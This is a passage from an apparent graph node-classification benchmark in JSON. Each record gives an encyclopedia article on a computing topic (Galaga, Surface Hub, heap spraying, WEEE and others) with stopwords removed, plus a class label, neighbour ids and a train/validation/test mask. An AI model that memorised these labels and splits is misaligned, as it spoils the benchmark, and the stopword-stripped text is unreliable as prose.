control layout basics game stripped early boring yokoyama suggested card instead show dual fighter mechanic means draw players team kept bringing designs namco president masaya nakamura continued reject ordered team simply make front team allowed set deadlines due namco then-laidback corporate structure feedback project given nakamura employees including pac-man creator toru iwatani despite game immense popularity around company early location tests failed meet expectations due players able get far game one coin thus generating low income although yokoyama stated game popularity could still generate income namco executives instructed team strengthen difficulty level galaga released japan september 1981 released north america midway games october year sega-galaga first home conversion galaga published sega sg-1000 1983 msx version followed year later 1984 conversion family computer released 1985 japan later released internationally bandai nintendo entertainment system subtitled demons death atari inc. published atari 7800 version one console thirteen launch games namco published game boy version japan 1995 bundled galaxian titled galaxian galaga nintendo published game outside japan arcade classic brand two mobile phone versions released confined japan first i-mode 2001 second ezweb 2006 original arcade version released xbox live arcade service 2006 featuring online leaderboards achievements nes release ported wii virtual console 2007 followed arcade version 2009 roku port published 2011 2013 nes version released 3ds wii u virtual console galaga one four games released arcade game series brand published xbox one playstation 4 pc 2016 galaga included namco compilations including namco museum vol 1 1995 namco museum 64 1996 namco museum 50th anniversary 2005 namco museum virtual arcade 2008 namco museum essentials 2009 namco museum megamix 2010 2010 wii game pac-man party 2011 nintendo 3ds version include galaga extra alongside arcade versions dig dug pac-man celebration game 30th anniversary 2011 high-definition remake released ios devices part galaga 30th collection also included remakes galaxian gaplus galaga '88 alongside xbox 360 playstation 3 sequel galaga legions ported nintendo 3ds 2011 part pac-man galaga dimensions original version also added ios namco arcade compilation 2012 nes release one 30 games included nes classic edition galaga met widespread critical acclaim upon release many applauding game addictive nature gameplay structure innovation improvements predecessor popular game golden age arcade video games arcade express selected honorable mention 1983 arcade awards allgame praised game strategy making stand amongst games type labeling gameplay perfectly balanced shooting action reviewing nes home version gamespy called galaga must play arcade freaks praising port accurate representation arcade version terms graphics sound effects gameplay ign also praised nes port element strategy within duel fighter mechanic addictive gameplay gamespot review xbox 360 digital release stated gameplay tricky ever praising inclusion online leaderboards faithful arcade conversion eurogamer agreed citing leaderboards add game addictiveness ports galaga received praise faithfulness arcade original nintendo life praised 3ds virtual console port nes version remaining accurate original stating aged surprisingly well worth revisiting games magazine praised improvements games space invaders galaxian commenting galaga still holds years later joystick magazine praised nes version accurate portrayal arcade original notably graphics gameplay structure famicom tsūshin commended game boy version faithful conversion alongside support super game boy peripheral electric playground stated near top game boy next purchase list publications expressed disappointment towards home releases lacking extra features gamespot disliked lack online multiplayer xbox 360 release well lack updated graphics setting saying port awfully bare bones compared xbla releases eurogamer expressed distaste towards xbox 360 port high price point well achievements insultingly easy obtain eurogamer also agreed gamespot lack online multiplayer galaga listed numerous publications among greatest video games time flux magazine ranked 57 top 100 video games 1995 game informer listed 23 top 200 games time 2010 next generation ranked 96 top 100 games time innovation shoot 'em games whole game informer labeled 19th greatest video game ever made 2001 calling best game fixed-shooter genre electronic gaming monthly listed 20 100 best games time 1997 top 100 games time 2001 28 greatest 200 videogames time 2006 gamefaqs users voted 15th greatest game ever made 2004 10th 2009 gamespy staff voted eighth best arcade game time 2011 ranked 93 ign top 100 games time addictive gameplay long-standing appeal killer list videogames listed 27 top 100 video games list well 4th collected arcade game 2nd popular website electronic gaming monthly listed ms. pac-man/galaga class 1981 second best arcade game time inclusion games shortly game release namco produced miniature galaga cabinets buses airplanes housed small 17-inch crt monitors 2000 namco released arcade cabinet celebrate game 20th anniversary bundled ms. pac-man titled ms. pac-man galaga class 1981 similar cabinet released 2005 also included original pac-man made celebrate latter 25th anniversary galaga also included pac-man ’ arcade party 2010 pac-man ’ pixel bash 2019 galaga made cameo appearances several films including wargames 1983 karate kid 1984 planes trains automobiles 1987 avengers 2012 pixels 2015 submarine named game appears throughout abc television series lost hallmark cards released galaga arcade cabinet ornament 2009 played sound effects game 2019 researchers north carolina state university named extinct species shark galagadon nordquistae due shark teeth baring resemblance aliens found game galaga also subject several high score-based tournaments — 2019 world record held armando gonzales score 9,525,700 points galaga used loading screen minigame playstation version tekken tie-in anime series space dandy ios remake space galaga released 2015 featuring characters starships space dandy intermixed galaga gameplay similar crossover game galaga tekken edition released year replacing enemies characters tekken franchise galaga -themed costume also available downloadable-content littlebigplanet 3 boss galaga appears item super smash bros. nintendo 3ds wii u followup super smash bros ultimate capture opponent carry screen ultimate also features remix galaga soundtrack animated television adaptation galaga chronicles confirmed development",
    "neighbors": [
      226,
      3075,
      1060,
      4361,
      2540,
      9516,
      9006,
      10287,
      1776,
      10544,
      10931,
      8663,
      4540,
      3039
    ],
    "mask": "Validation"
  },
  {
    "node_id": 11523,
    "label": 8,
    "text": "Groovle:groovle groovle web search site offered customers ability customise home page underlying service provided google company owned operated entirely independently december 2009 google lost court case claimed groovle domain similar control passed zak muscovitch attorney groovle stated case people use google people appreciate google people love google ... think people appreciate little guy takes giant wins",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 11524,
    "label": 2,
    "text": "Surface_Hub:surface hub surface hub brand interactive whiteboard developed marketed microsoft part microsoft surface family surface hub wall-mounted roller-stand-mounted device either 55-inch 140 cm 1080p 84-inch 210 cm 4k 120 hz touchscreen multi-touch multi-pen capabilities running windows 10 operating system devices targeted businesses use collaborating videoconferencing may 15 2018 microsoft announced second-generation surface hub 2 would released 2019 2012 microsoft acquired jeff han perceptive pixel previously developed large-screen multi-touch displays cnn magic wall microsoft indicated 2014 intended mass-produce devices part effort bring cost microsoft first announced surface hub windows 10 devices event january 21 2015 device use throughout majority keynote microsoft began taking surface hub pre-orders july 1 2015 55-inch model 84-inch model stating would begin shipping september 2015 however july 13 2015 announced microsoft surface blog pre-order demands greatly exceeded predictions shipments would delayed details regarding delays coming mid-august confirmed microsoft delayed shipment january 1 2016 december 2015 microsoft announced another delay would raising prices 2,000 though would honor price agreements pre-orders placed surface hub began shipping business customers march 25 2016 surface hub models use 4th-generation intel core haswell processors core i5 55-inch core i7 84-inch run 64-bit version windows 10 main differences two variants screen size resolution graphics adapters 55-inch model supports 1920 × 1080 full hd contains intel hd graphics 4600 controller integrated cpu more-expensive 84-inch model 3840 × 2160 4k resolution powered nvidia quadro k2200 discrete graphics adapter screen models high-definition display 120 hz refresh rate though intended use film tv screening screen capable achieving high levels brightness 424.38 cd/m reach minimum 1.58 cd/m screen touch sensor allows detect whether stylus used surface hub models wide-angle hd camera either side device cameras produce video 1080p 30 fps enabled four-element microphone array cameras sensors ambient light infrared presence allowing hub react light levels heat room e.g activating presentation program someone enters room used videoconferencing cameras intended automatically track person moving one side display according microsoft four-element microphone array detect whisper away pc magazine tests hub realistic estimation surface hub runs windows 10 team customized version windows 10 enterprise software product jt2go developed siemens allows users surface hub interact 3d model models displayed angle enlarged reduced real time application used windows 10 devices particularly useful surface hub skype business video conferencing included surface hub microsoft office applications also used including word powerpoint excel microsoft onenote allows users draw screen hub welcome screen three buttons – call whiteboard connect – corresponding promoted themes talking drawing sharing functions used individually simultaneously surface hub originally manufactured plant wilsonville oregon july 2017 however microsoft announced would moving production china closing plant following months resulting loss jobs 124 workers microsoft surface hub keyboard insufficient protection replay attacks attacker could control surface hub remotely certain scenarios",
    "neighbors": [
      259,
      4356,
      11524,
      6150,
      6797,
      782,
      1935,
      9741,
      10900,
      3605,
      11030,
      3224,
      11549,
      7838,
      7456,
      929,
      5666,
      3875,
      7970,
      10658,
      11559,
      1832,
      6441,
      6827,
      7215,
      7983,
      3890,
      11060,
      8757,
      2237,
      7359,
      4289,
      194,
      582,
      3527,
      9033,
      6476,
      10957,
      4816,
      4051,
      9812,
      11221,
      11605,
      4439,
      11103,
      4704,
      9057,
      10338,
      740,
      2919,
      8296,
      617,
      8681,
      9448,
      1776,
      9585,
      7796,
      8694,
      6265,
      1916
    ],
    "mask": "Validation"
  },
  {
    "node_id": 11525,
    "label": 2,
    "text": "Swaret:swaret swaret program slackware linux distribution resolves dependencies swaret stands slackware tool program created luc cottyn originally called autopkg however conflict another project name renamed swaret active maintainer swaret currently runs stux http //swaret.org",
    "neighbors": [
      2310,
      10760,
      2955,
      7435,
      7181,
      7947,
      9487,
      2448,
      10387,
      788,
      1813,
      8213,
      10900,
      6680,
      8476,
      10149,
      5670,
      4775,
      7847,
      6828,
      6446,
      7983,
      1842,
      823,
      2872,
      6583,
      3131,
      5819,
      10172,
      190,
      3649,
      10817,
      9671,
      5067,
      3918,
      463,
      3667,
      6227,
      4951,
      6361,
      2010,
      9564,
      2401,
      1379,
      7140,
      741,
      231,
      5096,
      6119,
      9063,
      9324,
      7920,
      6257,
      1138,
      1522,
      10096,
      6393,
      7293
    ],
    "mask": "Test"
  },
  {
    "node_id": 11526,
    "label": 4,
    "text": "Internet_Security_Awareness_Training:internet security awareness training internet security awareness training isat consists training members organization regarding protection various information assets organization organizations need comply government regulations i.e glba pci hipaa sarbox normally require formal isat employees usually twice year many small medium enterprises sme require isat regulatory compliance train employees prevent cyberheist internet security awareness training point time usually provided via online courses isat subset general security awareness training topics covered isat include internet security aware means understand people actively trying steal data stored within organization computers often focuses user names passwords criminal elements ultimately get access bank accounts high-value assets important protect assets organization stop happening according microsoft focus isat achieve immediate lasting change attitude employees towards internet security making clear security policies acceptable use policies vital survival organization rules restrict employee efficient work security awareness training employees one effective means reducing potential costly errors handling sensitive information protecting company information systems training conducted number means certain approaches effective others security awareness training ensure personnel solid understanding employer ’ security practices policies contrast uninformed employee susceptible malware phishing attacks forms social engineering substantial harm organization ’ systems place data risk key aspects awareness training program include following",
    "neighbors": [
      4448,
      2737,
      8881,
      3125,
      10232,
      7515
    ],
    "mask": "None"
  },
  {
    "node_id": 11527,
    "label": 3,
    "text": "Exile_(1988_video_game_series):exile 1988 video game series exile series centers sadler syrian assassin main character game original computer versions notorious featuring various references religious historical figures modern political leaders iconography drugs time-traveling assassins although aspects considerably toned omitted later console games english versions rewriting historical religious organizations fictional groups first game series originally released nec pc-8801 july 1988 subsequently released msx2 nec pc-9801 august x1 turbo september gameplay included action-platform elements switching overhead perspective side-scrolling sections plot original xzr compared later assassin creed video game series soundtrack pc-8801 version composed yujiroh shinobu ogawa tenpei sato game centers sadler syrian assassin shia islamic sect journey kill caliph intro sequence briefly covers history middle east 622 ce first year islamic calendar including brief description hijra 1104 ce year sadler birth game starts baghdad sadler rescues rumi follows sadler persia babylon must defend euphrates river pollution oil magnate encounter assyrian queen semiramis babylonian goddess ishtar visit tower babel search unicorns heading alexandria becoming baptised jewish village searching ouroboros eventually sadler makes way back baghdad murders caliph revealed caliph father separated sadler kidnapped baby assassins game switches focus enters subplot mongol invasion sadler warped 20th century must assassinate russia general secretary america president ending game likely controversial ending telenet choose port original xzr decided bring series home consoles three years later opting remake sequel instead released december 17 1988 nec pc-8801 nec pc-9801 msx2 soundtrack pc-8801 version composed shinobu ogawa tenpei sato xzr ii depicts adventures sadler events previous game living time christian crusades sadler makes attempt unite world one god achieve world peace along way performs masonic ritual attempt revive mani slaughters many hindu buddhist deities sadler meets head knights templar hugues de payens helps search holimax holy artefact sadler travels several different countries including france rumi kidnapped india cambodia japan cambodian temple sadler resurrects manichaean prophet mani japan sadler rescues ninkan real life head japanese sex cult tachikawa-ryu afterwards sadler travels back time eden meets bacchus sadler also murders hiram abiff masonic figure defeating jubelum three ruffians sadler receives holimax first console installment series first released pc engine cd-rom² system march 29 1991 mega drive version released year december 6 versions game released north america following year genesis version published renovation products turbografx-cd version published working designs exile remake xzr ii rewrites story cutting one portion final act sadler time travels present day referenced ending original xzr removes character sufrawaldhi sadler fourth traveling companion genesis version removed scenes deemed inappropriate burning village instances naked women later areas working designs asked nec change names turbografx-cd version concerned religious drug-related elements hence christian crusaders became klispin crusaders given rules nec pretty sensitive subject direct references changed explained vic ireland worked closely game localization town crucified heretics burned alive left turbografx cd release removed genesis version final game series released japan super cd-rom² add-on september 22 1992 released north america july 31 1993 published working designs previous games featured heavy religious elements sadler striving defeat chaos solve mystery ancient tower game cover art featured photograph rarity north america game final boss handcrafted vic ireland commented saying exile 2 cover polarizing people love hate basically aping style diorama really popular advertise games japan ncs/masaya quite bit wanted bring us well chose exile 2 game try practical effects guy little models set ad done fx work movies like tremors since done work weta australia smoke time exposure give thickness glow ran ad egm gamepro ca n't remember sent us survey months later readers ad listed 'most remembered ad whole magazine think justified experiment tried vasteel results n't great used part one space scenes back cover jewel case protagonist series sadler voiced kaneto shiozawa japanese cd-rom version blake dorsey english young warrior village assassi excels swordsmanship martial arts companions include rumi voiced yūko minaguchi japanese rhonda gibson english female fellow warrior assassi skilled acrobatics espionage fakhyle voiced kōji yada japanese keith lack english elderly magician lends powers sadler kindhy voiced hirohiko kakegawa japanese unknown actor english silent giant unmatched superhuman strength xzr exile series action role-playing games consisting three types play modes hideout screens rpg screens action screens hideout screen consists menu player plan sadler next course actions viewing current companions belongings stats choosing next location visit game switches rpg mode player visits town consists overhead map player must explore order gather clues proceed story usually consists talking supporting characters fulfill tasks give order gain access new locations player also visit various types shops buy new equipment items player enters dungeon game switches side-scrolling action stage sadler must fight way enemies finding treasure chests along way achieving objective finding exit sadler fights primarily sword also use magic spells acquires ability like action rpgs sadler gains certain amount cash experience points every enemy kills addition hp hit points mp magic points two statistics represented screen ap attack power player offensive capabilities ac armor class player defensive capabilities determined sadler current level equipment one notable aspect original computer versions presence illicit drugs addition conventional items potions medical herbs sadler also uses narcotics hashish coca opiates lsd marijuana peyote heal increase attributes player ap ac statistics represented heart-rate graph computer versions green bars console version affected drugs sadlers uses overusing certain drugs would result side-effects including death exile console version xrz ii replaced illicit drugs fictionalized equivalents e.g opiates became heartpoisons lack negative side-effects original counterparts exile wicked phenomenon revamps several aspects previous games ditching hideout screens adding option switch sadler companions rumi kindi fakhyle action segments using unique abilities wicked phenomenon also brings back illicit narcotics missing original exile english version game using altered spellings names e.g cannabis became cananavis ap ac gauges longer present hud instead shows player health experience points cash player still use drugs temporarily enhance offensive defensive stats exile named one renovation top 10 games ign levi buchanan ign stated translation genesis edition pretty bad little effect breadth adventure game also featured positive light book 8-bit book – 1981 199x jerry ellis exile wicked phenomenon given decent review john huxley defunctgames.com wrote exile solid game successfully marries action role-playing said deep adventure ys ii also mentioned voiceovers terrific complaining graphics cutscenes little thin",
    "neighbors": [
      8355
    ],
    "mask": "Validation"
  },
  {
    "node_id": 11528,
    "label": 1,
    "text": "Qizx:qizx qizx proprietary xml database provides native storage xml data qizx initially developed xavier franc axyana purchased qualcomm 2013 qizx re-released qualcomm late 2014 amazon web services qizx database configured run embedded application hosted client-server environment software service hosted amazon web services client-server version supports database clustering load balancing data redundancy qizx bundled multi-platform gui client also accessed restful api includes embedded online documentation qizx includes bindings java python c c well native xpath xquery support qizx also provides number extensions xquery language updating documents accessing document metadata various tasks",
    "neighbors": [
      9828,
      9863,
      8554,
      5612,
      5677,
      7983,
      7248,
      6775,
      2045,
      479
    ],
    "mask": "None"
  },
  {
    "node_id": 11529,
    "label": 0,
    "text": "Universal_Networking_Language:universal networking language universal networking language unl declarative formal language specifically designed represent semantic data extracted natural language texts used pivot language interlingual machine translation systems knowledge representation language information retrieval applications unl designed establish simple foundation representing central aspects information meaning machine- human-language-independent form language-independent formalism unl aims code store disseminate retrieve information independently original language expressed sense unl seeks provide tools overcoming language barrier systematic way first glance unl seems kind interlingua source texts converted translated target languages fact used purpose efficiently however real strength knowledge representation primary objective provide infrastructure handling knowledge already exists exist given language nevertheless important note present would foolish claim represent “ full ” meaning word sentence text language subtleties intention interpretation make “ full meaning ” however might conceive variable subjective systematic treatment thus unl avoids pitfalls trying represent “ full meaning ” sentences texts targeting instead “ core ” “ consensual ” meaning often attributed sense much subtlety poetry metaphor figurative language innuendo complex indirect communicative behaviors beyond current scope goals unl instead unl targets direct communicative behavior literal meaning tangible concrete basis human communication practical day-to-day settings unl approach information conveyed natural language represented sentence sentence hypergraph composed set directed binary labeled links referred relations nodes hypernodes universal words simply uws stand concepts uws also annotated attributes representing context information example english sentence ‘ sky blue ’ represented unl follows example sky icl natural world blue icl color represent individual concepts uws aoj attribute object directed binary semantic relation linking two uws def interrogative past exclamation entry attributes modifying uws uws intended represent universal concepts expressed english words natural language order humanly readable consist headword uw root constraint list uw suffix parentheses constraints used disambiguate general concept conveyed headword set uws organized unl ontology high-level concepts related lower-level ones relations icl kind iof instance equ equal relations intended represent semantic links words every existing language ontological icl iof referred logical thematic agt agent ins instrument tim time plc place etc. currently 46 relations unl specs jointly define unl syntax attributes represent information conveyed uws relations normally represent information concerning time past future etc reference def indef etc modality must etc focus topic focus etc within unl program process representing natural language sentences unl graphs called unlization process generating natural language sentences unl graphs called nlization unlization involves natural language analysis understanding intended carried semi-automatically i.e. humans computer aids nlization intended carried fully automatically unl programme started 1996 initiative institute advanced studies united nations university tokyo japan january 2001 united nations university set autonomous organization undl foundation responsible development management unl programme foundation non-profit international organisation independent identity united nations university although special links un inherited unu/ias mandate implementing unl programme fulfil mission programme already crossed important milestones overall architecture unl system developed set basic software tools necessary functioning tested improved vast amount linguistic resources various native languages already development well unl expression accumulated last years moreover technical infrastructure expanding resources already place thus facilitating participation many languages unl system growing number scientific papers academic dissertations unl published every year visible accomplishment far recognition patent co-operation treaty pct innovative character industrial applicability unl obtained may 2002 world intellectual property organisation wipo acquiring patents us patents 6,704,700 7,107,206 unl completely novel achievement within united nations",
    "neighbors": [
      416,
      1890,
      10,
      523,
      3085,
      8688,
      11056,
      7164
    ],
    "mask": "Test"
  },
  {
    "node_id": 11530,
    "label": 1,
    "text": "SQream_DB:sqream db sqream db relational database management system rdbms uses graphics processing units gpus nvidia sqream db designed big data analytics using structured query language sql sqream db first product sqream technologies ltd founded 2010 ami gal kostya varakin tel aviv israel sqream db first released 2014 partnership orange s.a. silicon valley company claimed orange s.a. saved 6 million using sqream 2014 sqream db aimed budget multi-terabyte analytics market due modest hardware requirements use compression sqream db also basis product named genomestack querying many dna sequences simultaneously us 7.4m investment venture capital announced june 2015 example general-purpose computing graphics processing units competitors omnisci kinetica company applied patents encompassing parallel execution queries multi-core processors speeding parallel execution vector processors february 2018 sqream technologies partnered alibaba group alibaba cloud deliver gpu database solution alibaba cloud column-oriented database sqream db designed manage large fast-growing volumes data compute-intensive queries product claims improve query performance large datasets traditional relational database systems sqream db designed run premise cloud",
    "neighbors": [
      8514,
      3,
      3876,
      10658,
      823,
      10286,
      5295,
      7983,
      10413,
      10675,
      10389,
      7767
    ],
    "mask": "Validation"
  },
  {
    "node_id": 11531,
    "label": 0,
    "text": "Generative_lexicon:generative lexicon generative lexicon gl theory linguistic semantics focuses distributed nature compositionality natural language first major work outlining framework james pustejovsky generative lexicon 1991 subsequent important developments presented pustejovsky boguraev 1993 bouillon 1997 busa 1996 first unified treatment gl given pustejovsky 1995 unlike purely verb-based approaches compositionality generative lexicon attempts spread semantic load across constituents utterance central philosophical perspective gl two major lines inquiry 1 able deploy finite number words language unbounded number contexts 2 lexical information representations used composing meanings separable commonsense knowledge gl initially developed theoretical framework encoding selectional knowledge natural language turn required making changes formal rules representation composition perhaps controversial aspect gl manner lexically encoded knowledge exploited construction interpretations linguistic utterances computational resources available lexical item within theory consist following four levels qualia structure inspired moravcsik 1975 interpretation aitia aristotle defined pustejovsky modes explanation associated word phrase language defined follows",
    "neighbors": [
      8099
    ],
    "mask": "Validation"
  },
  {
    "node_id": 11532,
    "label": 5,
    "text": "Network_Voice_Protocol:network voice protocol network voice protocol nvp pioneering computer network protocol transporting human speech packetized communications networks early example voice internet protocol technology nvp first implemented december 1973 computer networking researcher danny cohen information sciences institute isi university southern california funding arpa network secure communications nsc program project stated goals develop demonstrate feasibility secure high-quality low-bandwidth real-time full-duplex two-way digital voice communications packet-switched computer communications networks ... supply digitized speech secured existing encryption devices major goal research demonstrate digital high-quality low-bandwidth secure voice handling capability part general military requirement worldwide secure voice communication nvp used send speech distributed sites arpanet using several different voice-encoding techniques including linear predictive coding lpc continuously variable slope delta modulation cvsd cooperating researchers included steve casner randy cole paul raveling isi jim forgie lincoln laboratory mike mccammon culler-harrison john markel speech communications research laboratory john makhoul bolt beranek newman protocol consisted two distinct parts control protocols data transport protocol control protocols included relatively rudimentary telephony features indicating wants talk ring tones negotiation voice encoding call termination data messages contained encoded speech encoding scheme vocoder frame defined packet containing negotiated transmission interval number digitized voice samples nvp used experimental voice funnel equipment circa february 1981 based bbn butterfly computers part ongoing arpa research packetized audio arpa staff contractors used voice funnel related video facilities three-way four-way video conferencing among handful us east west coast sites nvp transported internet stream protocol st later version called stream protocol version 2 st-ii connection-oriented versions internet protocol ip carried ip protocol version 5 protocols may viewed early experiments quality service connection-oriented network protocols asynchronous transfer mode atm",
    "neighbors": [
      5472
    ],
    "mask": "Test"
  },
  {
    "node_id": 11533,
    "label": 4,
    "text": "Fault_(technology):fault technology document iso 10303-226 fault defined abnormal condition defect component equipment sub-system level may lead failure telecommunications according federal standard 1037c united states term fault following meanings random fault fault occurs result wear deterioration whereas time particular occurrence fault determined rate faults occur within equipment population average predicted accuracy manufacturers often accept random faults risk chances virtually negligible fault happen virtually object appliance common electronics machinery example xbox 360 console deteriorate time due dust buildup fans cause xbox overheat cause error shut console systematic faults often result error specification equipment therefore affect examples type faults remain undetected years conditions conduce create failure given circumstances every example equipment would fail identically time failures hardware caused random faults systematic faults failures software always systematic",
    "neighbors": [
      8233,
      5452,
      6482,
      6392,
      1694
    ],
    "mask": "None"
  },
  {
    "node_id": 11534,
    "label": 4,
    "text": "Waste_Electrical_and_Electronic_Equipment_Directive:waste electrical electronic equipment directive waste electrical electronic equipment directive weee directive european community directive 2012/19/eu waste electrical electronic equipment weee together rohs directive 2011/65/eu became european law february 2003 weee directive set collection recycling recovery targets types electrical goods minimum rate 4 kilograms per head population per annum recovered recycling 2009 rohs directive set restrictions upon european manufacturers material content new electronic equipment placed market symbol adopted european council represent waste electrical electronic equipment comprises crossed-out wheelie bin without single black line underneath symbol black line indicates goods placed market 2005 directive came force goods without black line manufactured 2002 2005 instances treated historic weee fall outside reimbursement via producer compliance schemes directive undergone number minor revisions since inception 2002 directive 2002/96/ec european parliament council 27 january 2003 include updates 2006 2009 nine years directive seen failing achieve goals hence legislation amended 20 december 2011 european parliament european council agreed amendments directive subject second-reading vote taken 19 january 2012 changes affect method calculating collection rates previously four kg per inhabitant per year provide transitional period seven years introduce revised method calculation present method retained first four years time amended directive comes force next three years commencing fifth year amendment calculation collection rates revised 45 weight e e products entering market seven years transitional period eu member states individually select actual collection options wish use overall aim eu recycle least 85 electrical electronics waste equipment 2016 directive imposes responsibility disposal waste electrical electronic equipment manufacturers distributors equipment requires companies establish infrastructure collecting weee way users electrical electronic equipment private households possibility returning weee least free charge directive saw formation national producer compliance schemes manufacturers distributors paid annual fee collection recycling associated waste electronics household waste recycling centres weee directive obliged twenty-five eu member states transpose provisions national law 13 august 2004 cyprus met deadline 13 august 2005 one year deadline member states except uk transposed least framework regulations weee directive transposed uk law 2006 active following year directive places weee numerous categories first tier historic non-historic historic weee implies equipment placed market prior 2005 weee directive places onus upon owner equipment make provisions recycling equipment placed market 2005 known non-historic weee denoted bar underneath crossed-out wheeled bin symbol responsibility producer/distributor make provisions collection recycling weee directive sets total 10 categories weee reporting purposes prior implementation weee directive uk waste electronic electrical equipment disposed household municipal waste stream post introduction hazardous waste regulations exclusions apply electrical electronic equipment deemed hazardous hazardous wastes derived issued universal eu descriptor european waste catalogue known uk list wastes denotes wastes six digit number three sets two hazardous wastes denoted asterisk end number hazardous electronic wastes comprise weee delivered household waste recycling centres hwrc also known designated collection facilities dcfs collected delivered approved authorised treatment facilities aatfs waste electrical electronic equipment weighed categorised accordance directive post re-processing recycling total volumes category reported producer compliance scheme reprocessor reimbursed accordingly totals obligated weee aatfs collated environment agency quarterly basis reported eu historically problems implementation producer compliance schemes due double counting reporting reprocessed weee producer compliance schemes arose obligated weee partially treated first aatf receive waste prior passed onto second aatf treatment first second aatf would claim waste electronics resulting net debt wastes treated additional legislation applies management weee applied via waste hierarchy particular emphasis upon reduction waste arising re-use equipment recycling recovery materials reduce reuse recycle january 2012 proposals debated european parliament recast weee directive proposals included increasing recycling rates adopted member states re-drafted directive requires higher recovery rates 20 kg per capita per annum opposed previous figures 4 kg per capita april 2005 royal society arts uk conjunction canon unveiled 7 metre tall sculpture titled weee man london south bank made 3.3 tonnes electrical goods—the average amount electrical waste one uk individual creates lifetime designed paul bonomini fabricated stage one creative services giant figure subsequently moved eden project cornwall part uk tour",
    "neighbors": [
      6658,
      1477,
      3181,
      9499,
      3666,
      2867,
      403,
      7579,
      1500
    ],
    "mask": "Train"
  },
  {
    "node_id": 11535,
    "label": 6,
    "text": "Sector/Sphere:sector/sphere sector/sphere open source software suite high-performance distributed data storage processing broadly compared google gfs mapreduce technology sector distributed file system targeting data storage large number commodity computers sphere programming architecture framework supports in-storage parallel data processing data stored sector sector/sphere operates wide area network wan setting system created yunhong gu author udp-based data transfer protocol 2006 maintained group developers sector/sphere consists four components security server maintains system security policies user accounts ip access control list one master servers control operations overall system addition responding various user requests slave nodes store data files process upon request clients users computers system access data processing requests issued also sector/sphere written c++ claimed achieve architecture two four times better performance competitor hadoop written java statement supported aster data systems benchmark winning bandwidth challenge supercomputing conference 2006 2008 2009 sector user space file system relies local/native file system node storing uploaded files sector provides file system-level fault tolerance replication thus require hardware fault tolerance raid usually expensive sector split user files blocks instead user file stored intact local file system one slave nodes means sector file size limitation application specific advantages however sector file system simple leads better performance sphere parallel data processing due reduced data transfer nodes also allows uploaded data accessible outside sector system sector provides many unique features compared traditional file systems sector topology aware users define rules files located replicated system according network topology example data certain user located specific cluster replicated racks another example files replicas others rules applied per-file level topology awareness use udt data transfer protocol allows sector support high performance data io across geographically distributed locations file systems deployed within local area network reason sector often deployed content distribution network large datasets sector integrates data storage processing one system every storage node also used process data thus support massive in-storage parallel data processing see sphere sector application aware meaning provide data location information applications also allow applications specify data location whenever necessary simple example benefits sphere sector return results commands grep md5sum without reading data file system moreover compute results multiple files parallel sector client provides api application development allows user applications interact directly sector software also comes prepackaged set command-line tools accessing file system finally sector supports fuse interface presenting mountable file system accessible via standard command-line tools sphere parallel data processing engine integrated sector used process data stored sector parallel broadly compared mapreduce uses generic user defined functions udfs instead map reduce functions udf either map function reduce function even others sphere manipulate locality input data output data thus effectively support multiple input datasets combinative iterative operations even legacy application executable sector split user files sphere simply wrap many existing applications accepts files directories input without rewriting thus provide greater compatibility legacy applications",
    "neighbors": [
      609,
      4194,
      7816,
      1801,
      10377,
      7983,
      11343,
      5047,
      3795,
      7155,
      823
    ],
    "mask": "Test"
  },
  {
    "node_id": 11536,
    "label": 5,
    "text": "Aurora_(protocol):aurora protocol aurora protocol link layer communications protocol use point-to-point serial links developed xilinx intended use high-speed gigabits/second connections internally computer embedded system uses either 8b/10b encoding 64b/66b encoding",
    "neighbors": [
      10833,
      7865
    ],
    "mask": "Validation"
  },
  {
    "node_id": 11537,
    "label": 4,
    "text": "Heap_spraying:heap spraying computer security heap spraying technique used exploits facilitate arbitrary code execution part source code exploit implements technique called heap spray general code sprays heap attempts put certain sequence bytes predetermined location memory target process allocate large blocks process heap fill bytes blocks right values heap spray actually exploit security issues used make vulnerability easier exploit heap spray used break security boundaries separate security issue needed exploiting security issues often hard various factors influence process chance alignments memory timing introduce lot randomness attacker point view heap spray used introduce large amount order compensate increase chances successful exploitation heap sprays take advantage fact architectures operating systems start location large heap allocations predictable consecutive allocations roughly sequential means sprayed heap roughly location every time heap spray run exploits often use specific bytes spray heap data stored heap serves multiple roles exploitation security issue application code often made read address arbitrary location memory address used code address function execute exploit force application read address sprayed heap control flow execution code uses address function pointer redirects sprayed heap exploit succeeds redirecting control flow sprayed heap bytes executed allowing exploit perform whatever actions attacker wants therefore bytes heap restricted represent valid addresses within heap spray holding valid instructions target architecture application crash therefore common spray single byte translates valid address nop nop-like instruction target architecture allows heap spray function large nop sled example 0x0c0c0c0c often used non-canonical nop heap sprays used occasionally exploits since least 2001 technique started see widespread use exploits web browsers summer 2005 release several exploits used technique wide range bugs internet explorer heap sprays used exploits similar showed versatility technique ease use without need major modifications exploits proved simple enough understand use allow novice hackers quickly write reliable exploits many types vulnerabilities web browsers web browser plug-ins many web browser exploits use heap spraying consist heap spray copy-pasted previous exploit combined small piece script html triggers vulnerability heap sprays web browsers commonly implemented javascript spray heap creating large strings common technique used start string one character concatenate way length string grow exponentially maximum length allowed scripting engine depending browser implements strings either ascii unicode characters used string heap spraying code makes copies long string shellcode stores array point enough memory sprayed ensure exploit works occasionally vbscript used internet explorer create strings using string function july 2009 exploits found using actionscript spray heap adobe flash though proven heap-spraying done means instance loading image files process seen widespread use august 2008 september 2012 new technique presented eusecwest 2012 two core researchers federico muttis anibal sacco showed heap sprayed high allocation granularity use technologies introduced html5 specifically used low-level bitmap interface offered canvas api web workers quickly",
    "neighbors": [
      5636,
      3462,
      3473,
      8609,
      3234,
      10786,
      11683,
      7717,
      2470,
      2732,
      7601,
      5682,
      5176,
      3270,
      4423,
      4956,
      8167,
      10097,
      2558
    ],
    "mask": "Train"
  },
  {
    "node_id": 11538,
    "label": 0,
    "text": "Question_answering:question answering question answering qa computer science discipline within fields information retrieval natural language processing nlp concerned building systems automatically answer questions posed humans natural language question answering implementation usually computer program may construct answers querying structured database knowledge information usually knowledge base commonly question answering systems pull answers unstructured collection natural language documents examples natural language document collections used question answering systems include question answering research attempts deal wide range question types including fact list definition hypothetical semantically constrained cross-lingual questions two early question answering systems baseball lunar baseball answered questions us baseball league period one year lunar turn answered questions geological analysis rocks returned apollo moon missions question answering systems effective chosen domains fact lunar demonstrated lunar science convention 1971 able answer 90 questions domain posed people untrained system restricted-domain question answering systems developed following years common feature systems core database knowledge system hand-written experts chosen domain language abilities baseball lunar used techniques similar eliza doctor first chatterbot programs shrdlu highly successful question-answering program developed terry winograd late 1960s early 1970s simulated operation robot toy world blocks world offered possibility asking robot questions state world strength system choice specific domain 